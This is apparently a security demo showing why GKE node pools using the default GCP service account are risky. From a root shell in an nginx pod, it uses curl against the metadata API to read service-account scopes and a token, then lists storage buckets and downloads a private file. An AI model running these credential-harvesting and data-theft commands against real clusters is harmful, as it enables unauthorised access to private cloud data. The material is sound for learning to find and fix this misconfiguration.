Create a Cluster and Node Pool using the default service account
Create a pod and SSH to that pod
Example nginx.yml
apiVersion: v1
kind: Pod
metadata:
name: nginx
spec:
containers:
- name: nginx
image: nginxCreate that nginx pod then SSH to it.
C:\Users\JMC\k8s>kubectl apply -f nginx.yml
pod/nginx created
C:\Users\JMC\k8s>kubectl exec -ti nginx bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
root@nginx:/#Above shows we just SSH logged in to that pod with root access.
Let’s demo how this is GKE cluster and node pool with GCP default service account will get a very high-security risk.
A pod can access a list of permission/scopes via curl accessing its GCP metadata API. So this means a pod has access to write logs, access logging.write, etc.
root@nginx:/# curl -s -H "Metadata-Flavor: Google" https://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/trace.appendA pod can get the GCP service account token
Let’s perform Server-Side Request Forgery (SSRF) attack!
Get the project ID. Below shows a pod was able to get the project ID majestic-layout-340900
Get the GCP Cloud storage bucket names
curl -H "Authorization: Bearer TOKEN" "https://storage.googleapis.com/storage/v1/b?project=majestic-layout-340900"So this is a private bucket with UniformBucketLevel access protection and `”uniformBucketLevelAccess” enabled which means the files are protected from public access
Below shows a pod can download a private content/file from a private bucket called private-bucket1
curl -H "Authorization: Bearer TOKEN" "https://storage.googleapis.com/storage/v1/b/private-bucket1/o/private.txt?generation=1648557043014755&alt=media" -o private.txt
